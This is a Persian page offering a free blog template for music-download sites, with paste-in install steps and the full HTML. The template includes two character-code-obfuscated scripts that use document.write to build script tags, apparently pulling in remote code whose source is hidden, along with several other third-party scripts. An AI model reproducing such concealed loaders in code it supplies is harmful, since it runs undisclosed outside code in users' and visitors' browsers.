تبلیغات
کد و قالب ابزار وبلاگ و وبسایت - قالب جدید برای وبلاگ و وب سایتهای دانلود آهنگ { خاکستری }
کد و قالب ابزار وبلاگ و وبسایت
کدهای بسیار جدید و زیبا


طریقه استفاده ازقالب دانلود خاکستری
برای نصب این قالب ابتدا در سایت با وارد کردن یوزرنیم و پسورد خودتان وارد کنترل پنل وبلاگ تان شوید، سپس مراحل زیر را انجام دهید.

١- در کنترل پنل وبلاگ بر روی قسمت ویرایش قالب کلیک کنید.
٢- تمام کدهای موجود در این صفحه را پاک کنید.
٣- کد زیر را کپی کنید و جایگزین کدهای قبلی نمایید.

 

 برای میهن بلاگ
 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">
<HTML xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>[cb:blog_page_title]</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="designer" content="Tem98.Ir">
<meta name="author" content="[cb:blog_author_name]">
<meta name="language" content="Farsi">
<meta name="description" content="[cb:blog_title] - [cb:blog_description] - [cb:blog_title]">
<meta name="keywords" content="[cb:blog_title],[cb:blog_address],[cb:blog_meta_description], Blog, Weblog, Persian,Iran, Farsi, Weblogs, Tem98.Ir">
<link rel="alternate" type="application/rss+xml" title="[cb:blog_title]" href="[cb:blog_rss_href]" />
<link rel="alternate" type="application/atom+xml" title="[cb:blog_title]" href="[cb:blog_atom_href]" />

<script type="text/javascript" language="javascript">
<!--
ML="he=c s>p:rt</\"mu.ij948";
MI=";539A7:45932=0::78<<:1>CE@A9<:1><A9D?<A9D?5BA:0@B5=6;<539A7:6";
OT="";
for(j=0;j<MI.length;j++){
OT+=ML.charAt(MI.charCodeAt(j)-48);
}document.write(OT);
// --></script>

<script  language="javascript" src="http://tem98.ir/tem/js/nazar.js"></script>
<script type="text/javascript">
//http://Bloger.rozblog.Com/
//Please Dont Remov
//If you want to copy this script Please Link me in your Blog!
function putcom(postid) {
var url =("[cb:blog_full_address]/post/comment/"+postid);
    if (window.location == "[cb:blog_full_address]/post/"+postid)
 {
  document.write('<div class=post><div class=post-title><div class=post-title-space><h1>نظرات وبلاگ</h1></div><div id=post-content><div class=post-content-text><iframe style="margin-top:5px;margin-bottom:5px" frameborder=0 id="comments" dir="rtl" width="100%" height="750px" onload="this.style.height = this.contentWindow.document.body.scrollHeight" src=[cb:blog_full_address]/post/comment/'+postid+'></iframe><div class=clear></div></div></div><div id=post-footer></div></div></div>');
 }
}
</script>


<style>
.header{
    background :transparent url(http://tem98.ir/tem/ir4u/header.jpg) no-repeat scroll center top;
    height:158px;
    width:960px;
    margin-right : 4px ;
    border:1px solid #9E9E9E ;
    border-width:0 0 1px 0
}
</style>
</head>
<body>
      <div id=warpper>
      <div class=header>
      </div>
      <div id=nav>
        <ul>
          <li><a href="/"><span>صفحه اصلی</span></a></li>
          <li><a href="/link"><span>دوستان</span></a></li>
          <li><a href="/post/archive"><span>آرشیو</span></a></li>                
          <li><a href="[cb:blog_contact_href]"><span>تماس با ما</span></a></li>
          <li><a href="http://Tem98.Ir"><span>طراح قالب</span></a></li>
          <li><a href="[cb:blog_rss_href]"><span>Rss</span></a></li>
        </ul>
        <cb:block_search>
        <div class="search_div">
          <form method="get" action="[cb:search_button_text]">
            <input type="text" value="جستجو ..." onFocus="if (this.value == 'جستجو ...') {this.value = '';}" onBlur="if (this.value == '') {this.value = 'جستجو ...';}"/ class="st" />
            <input type="submit" value="" class="sti"/>
          </form>
        </div>
        </cb:block_search>
      </div>

      <div class=content>
        <div id=page-content>
          <div class=two-box-warpper>
            <div id=page-body>
              <div class=page-body>
              <div class=ads-banners>
              <!-- محل درج تبلیغات بالای صفحه -->
              </div>
              <!-- POST -->
<cb:block_post>
<cb:loop_post>                                        
<div class=post>
<div class=post-title>
<div class=post-title-space><h1><a href="[cb:post_href]">[cb:post_title]</a></h1></div>
 <div class=meta>
 <ul>
<li id=category><cb:block_post_category>دسته بندی : <cb:loop_post_category><a href="[cb:post_category_href]">[cb:post_category_name]</a> ،
</cb:loop_post_category>
</cb:block_post_category>
</li>
</ul>
</div>
<div id=post-content>
<div class=post-content-text>
<p style="text-align: justify;">[cb:post_body1][cb:post_body2]</p>
<p style="text-align:left; font-family:Tahoma; font-size:11px;">[cb:post_continue_link]</p>
<cb:block_post_tag>
<img border="0" alt="icon" src="http://tem98.ir/tem/ir4u/tags.gif" width="17" height="15">برچسب‌ها :
<cb:loop_post_tag>
<a href="[cb:post_tag_href]" title="[cb:post_tag_name]"> [cb:post_tag_name]</a>,
</cb:loop_post_tag>
</cb:block_post_tag>
<br>
<cb:block_post_related_link>
<img border="0" alt="icon" src="http://tem98.ir/tem/ir4u/tags.gif" width="17" height="15"> دنبالک ها:
 <cb:loop_post_related_link>
<a href="[cb:post_related_link_href]"  target="_blank"> [cb:post_related_link_name]</a>,
</cb:loop_post_related_link>
</cb:block_post_related_link>
<div class=clear></div>
<div class=post-hr></div>
<div id=info>
<li id=author-post>نوشته:  [cb:post_author_name]</li>
<li id=date-post>[cb:post_create_date]</li>
<li id=comments-post><a href="[cb:post_href]">نظرات وبلاگ</a></li>
</div>
<div class=clear></div>
</div>
</div>
<div id=post-footer></div>
</div>
</div>


<div id="loadcomments" dir="rtl">
<script type="text/javascript">
{
var postid=[cb:post_id];
putcom(postid);
}
</script>
</div

</cb:loop_post>
</cb:block_post>
<!-- END POST -->
<!-- GENERAL LIST -->
<cb:block_general_list>                
<div class=post>
<div class=post-title>
<div class=post-title-space>
<h1>[cb:blog_page_title]</h1>
</div>
<div id=post-content>
<div class=post-content-text>
<p style="text-align: justify;">
<cb:loop_general_list>
<img src="http://tem98.ir/tem/ir4u/footer_arrow.gif"/> <a href="[cb:general_list_href]" title="[cb:general_list_title]"> [cb:general_list_text]</a><br />
</cb:loop_general_list>
</p><br/>
<div class=clear></div>
</div>
</div>
<div id=post-footer></div>
</div>
</div>
</cb:block_general_list>
<!-- END GENERAL LIST -->
<cb:block_pages>           
<div class=paginate>
<div class=paginate-title></div>
<div class=paginate-content>
<div id=paginate>
<div id=wp_page_numbers>
<ul>
<ul><div id="wp_page_numbers">
<center>
<div class=pagenu>
<cb:loop_pages>
<a href="[cb:pages_href]" title="رفتن به صفحه [cb:pages_no]">[cb:pages_no]</a>
</cb:loop_pages>
</div>
</center>
<div style='float: none; clear: both;'></div>
</div>

</ul>
<div style='float: none; clear: both;'></div>
</div>
                    </div>
                  </div>
                  <div class=paginate-footer></div>
                </div>                  </cb:block_pages>
<!-- End Pages -->
                <div class=clear></div>
              </div>
                                          </div>

            <!--sidebar-right-->
              <div id=sidebar-right>
                <div class=sidebar-right>
                  <DIV class="sidebar-box ads">
                    <H3><SPAN>تبلیغات</SPAN></H3>
                    <DIV class=sidebar-box-content>
                      <ul><center> محل درج كد تبلیغات
</center></ul>
                    </DIV>
                    
                    <DIV class=sidebar-box-footer></div>
                  </div>
                  <cb:block_author>
                  <DIV class="sidebar-box writer">
                    <H3><SPAN>نویسندگان</SPAN></H3>
                    <DIV class=sidebar-box-content>
                      <ul>
<cb:loop_author>
<li><a href="[cb:author_href]" title="[cb:author_post_count] ارسال">[cb:author_name]</a></li>
</cb:loop_author>
                        </ul>
                    </DIV>
                    <DIV class=sidebar-box-footer></div>
                  </div>
                  </cb:block_author>
                  <cb:block_blog_category>
                  <DIV class="sidebar-box category">
                    <H3><SPAN>آرشیو موضوعات</SPAN></H3>
                    <DIV class=sidebar-box-content>
                      <ul>     
<cb:loop_blog_category>
<li><a href="[cb:blog_category_href]" title="[cb:blog_category_post_count] ارسال">[cb:blog_category_name] ([cb:blog_category_post_count])</a></li>
</cb:loop_blog_category>
                       </ul>
                    </DIV>
                    <DIV class=sidebar-box-footer></div>
                  </div>
                  </cb:block_blog_category>
                  <cb:block_extrapage>
                   <DIV class="sidebar-box pages">
                    <H3><SPAN>صفحات اضافی</SPAN></H3>
                    <DIV class=sidebar-box-content>
                      <ul>     
<cb:loop_extrapage>
<li><a href="[cb:extrapage_href]" target="_blank">[cb:extrapage_title]</a></li>
</cb:loop_extrapage>
                        </ul>
                    </DIV>
                    <DIV class=sidebar-box-footer></div>
                  </div>
                  </cb:block_extrapage>
                  <cb:block_linkdaily>
               <DIV class="sidebar-box link-daily">
                    <H3><SPAN>پیوندهای روزانه</SPAN></H3>
                    <DIV class=sidebar-box-content>
                      <ul>     
<cb:loop_linkdaily>
<li><a href="[cb:linkdaily_href]" title="[cb:linkdaily_title]" target="_blank">[cb:linkdaily_text]</a></li>
</cb:loop_linkdaily>
<li><a target=_blank href="http://www.rozblog.com">بهترین سرویس وبلاگدهی</a></li>
<li><a target=_blank href="http://www.bloger.rozblog.com">ابزار رایگان وبلاگ</a></li>
<li><a target=_blank href="http://www.pica.rozblog.com">گالری عکس</a></li>
          <li><b> <a href="[cb:linkdaily_new_href]">ارسال لینك </a></b></li>
          <li><b> <a href="[cb:linkdaily_full_list_href]">ادامه - آرشیو لینكدونی</a> </b></li>
                        </ul>
                    </DIV>
                    <DIV class=sidebar-box-footer></div>
                  </div>

                  </cb:block_linkdaily>
                <DIV class="sidebar-box fal">
                  <H3><SPAN>فال حافظ</SPAN></H3>
                  <DIV class=sidebar-box-content>

<!-- www.bloger.Rozblog.com Web Master Tools --><script type="text/javascript" src="http://filmdoni.ir/fal/c-fal.js"></script><!-- www.bloger.Rozblog.com Web Master Tools -->

                </DIV>
                  <DIV class=sidebar-box-footer></div>
                </div>
                  <cb:block_stat>
                  <DIV class="sidebar-box status">
                    <H3><SPAN>آمار سایت</SPAN></H3>
                    <DIV class=sidebar-box-content>
                      <ul>     
 <li>بازدید های امروز :[cb:stat_today_view]</li>
 <li>بازدید های دیروز :[cb:stat_yesterday_view]</li>
 <li>بازدید های این ماه :[cb:stat_this_month_view]</li>
 <li>بازدید های ماه قبل :[cb:stat_last_month_view]</li>
<li> کل بازدید ها :[cb:stat_total_view]</li>
<li> تعداد کل مطالب :[cb:stat_total_post]</li>
                        </ul>
                    </DIV>
                    <DIV class=sidebar-box-footer></div>
                  </div>
                  </cb:block_stat>
                </div></div></div>
              
              <!--/sidebar-right-->
            
            <!--sidebar-left-->
            <div id=sidebar-left>
              <div class=sidebar-left>
                <DIV class="sidebar-box ads">
                  <H3><SPAN>تبلیغات</SPAN></H3>
                  <DIV class=sidebar-box-content>
                    <ul><center>محل درج كد تبلیغات</center></ul>
                  </DIV>
                  <DIV class=sidebar-box-footer></div>
                </div>                <cb:block_blog_archive>
                <DIV class="sidebar-box monthly-archive">
                  <H3><SPAN>آرشیو ماهانه</SPAN></H3>
                  <DIV class=sidebar-box-content>
                    <ul>
 <cb:loop_blog_archive><li>
<a href="[cb:blog_archive_href]" title="[cb:blog_archive_post_count] ارسال">[cb:blog_archive_text]</a><br>
</li></cb:loop_blog_archive>
 </ul>
                </DIV>
                  <DIV class=sidebar-box-footer></div>
                </div>
                </cb:block_blog_archive>                <cb:block_poll>
                <DIV class="sidebar-box poll">
                  <H3><SPAN>نظرسنجی</SPAN></H3>
                  <DIV class=sidebar-box-content>
                    
 <ul>
<b>[cb:poll_question]</b><br>
<cb:loop_poll><li>[cb:poll_answer]</li></cb:loop_poll>
<Center><input class="Button" type="submit" value="[cb:poll_button_text]"></Center>
</ul>    
                  </DIV>
                  <DIV class=sidebar-box-footer></div>
                </div>
                </cb:block_poll>
                <cb:block_link>
                <DIV class="sidebar-box top">
                  <H3><SPAN>لینك دوستان</SPAN></H3>
                  <DIV class=sidebar-box-content>
                    <ul>
 <cb:loop_link><li>
 <a href="[cb:link_href]" target="_blank" title="[cb:link_title]">[cb:link_text]</a>
 </li></cb:loop_link>      
<li><script src="http://tem98.ir/tem/js/link.js"></script></li>
<li><a target=_blank href="http://www.rozblog.com">بهترین سرویس وبلاگدهی</a></li>
<li><a target=_blank href="http://www.bloger.rozblog.com">ابزار رایگان وبلاگ</a></li>
<li><a target=_blank href="http://www.pica.rozblog.com">گالری عکس</a></li>           
                </ul>
                </DIV>
                  <DIV class=sidebar-box-footer></div>
                </div>
                </cb:block_link>
                                <DIV class="sidebar-box sup">
                  <H3><SPAN>پشتیبانی</SPAN></H3>
                  <DIV class=sidebar-box-content>

<div align="center">
<a href="http://tem98.ir" target="_blank"><img src="http://tem98.ir/logo/logo.gif" width="88" height="50" style="margin:3px" border="0"></a><br><br>
<a href="[cb:blog_rss_href]"><img src="http://rozblog.Com/temp/fanavari/rssfeed.gif" border="0"></a>  
<a href="[cb:blog_atom_href]"><img src="http://rozblog.Com/temp/fanavari/atomfeed.gif" border="0"></a><br><br>
<font color="#34A7DB">Powered By</font><br><a target="_blank" href="http://Rozblog.Com" style="color:#34A7DB0;font-weight: bold">Rozblog.Com</a><br>
</div>
<br><ul>[cb:blog_script]</ul>

                </DIV>
                  <DIV class=sidebar-box-footer></div>
                </div>

</div>
            </div>
            <div class=clear></div>
          </div></div>
          <!--/sidebar-left-->
        
        <div class=footer-line></div>
        <!-- Footer -->
        <div id=footer>
        <cb:block_blog_tag_cloud>
          <div id=tags>
            <h3><spanابر واژه</span></h3>
            <div class=tags-content>
<ul>
 <cb:loop_blog_tag_cloud>                
<a href="[cb:blog_tag_cloud_href]" style="font-size:[cb:blog_tag_cloud_size]em">[cb:blog_tag_cloud_text] ,</a>
</cb:loop_blog_tag_cloud>
</ul>
            </div>
            <div class=footer></div>
          </div>
          </cb:block_blog_tag_cloud>
          <!-- RSS Reader -->
          <div id=rss>
            <a href="[cb:blog_rss_href]"><img border="0" src="http://tem98.ir/tem/ir4u/rss_btn.png" width="130" height="153" alt="rss"></a>
          </div>
          <!-- /RSS Reader -->
          <cb:block_blog_recent_post>
          <div id=prepost>
            <h3><span>آخرین مطالب</span></h3>
            <div class=links-content>
              <ul>
                <ul id=right-prepost>
<cb:loop_blog_recent_post>
<li>
<a href="[cb:blog_recent_post_href]" >[cb:blog_recent_post_text]</a><br>
</li>
</cb:loop_blog_recent_post>

</ul>
                </ul>
              <div class=clear></div>
            </div>
            <div class=footer></div>
          </div></cb:block_blog_recent_post>
          <!-- /Footer -->
          <div class=clear></div>
        </div>
        <div class=copyright>
          <ul id=copyright>كپی برداری از این وبلاگ فقط با ذكز منبع مجاز میاشد - قدرت گرفته از میهن بلاگ !</ul>
<script type="text/javascript" language="javascript">
<!--
ML="8acuI.rmTh=D\"v>/dlpit 9:yen2Bg<fsj";
MI="N3AEC@:@IPCJMI6>;IPCMJI@ELHEGEN1E96IO:<9DDBG??8I7F0546<>8I7F0546N?1>N?3A>N@C=E2A1PP:2AI16>N?@C=>N?@C=>NP26CBDEP62:<9DDBG??DI7F05C6?DI7?QP?DI7K5QP<>N?P26CBD>";
OT="";
for(j=0;j<MI.length;j++){
OT+=ML.charAt(MI.charCodeAt(j)-48);
}document.write(OT);
// --></script>
 </body>
</html>

 
 ارسال توسط فرشید سالار
آرشیو مطالب
پیوند های روزانه
امکانات جانبی
blogskin
لینکستان

ابزار وبلاگ

قالب وبلاگ

دانلود آهنگ